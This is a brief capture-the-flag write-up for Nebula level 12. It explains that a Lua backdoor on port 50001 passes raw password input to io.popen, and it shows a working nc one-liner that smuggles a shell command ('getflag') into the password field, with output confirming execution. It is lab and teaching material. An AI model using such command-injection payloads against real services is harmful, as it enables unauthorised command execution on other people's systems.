20xx-A1-Injection

         Nebula 12 Agenda: “There is a backdoor process listening on port 50001”

This one is pretty easy, it contains injection flaw. The vulnerability arises when a naked unhandled input string falls into “hash” function as an “password” argument. io.popen lua facility starts command sequence in a separated process, thereby we can provide injection:

1 level12@nebula:~$ echo "0; getflag > /tmp/flag; echo 0" | nc localhost 50001
2 Password: Better luck next time
3 level12@nebula:~$ cat /tmp/flag 
4 You have successfully executed getflag on a target account

As well, in this manner we didn’t break the execution chain. “Voila”!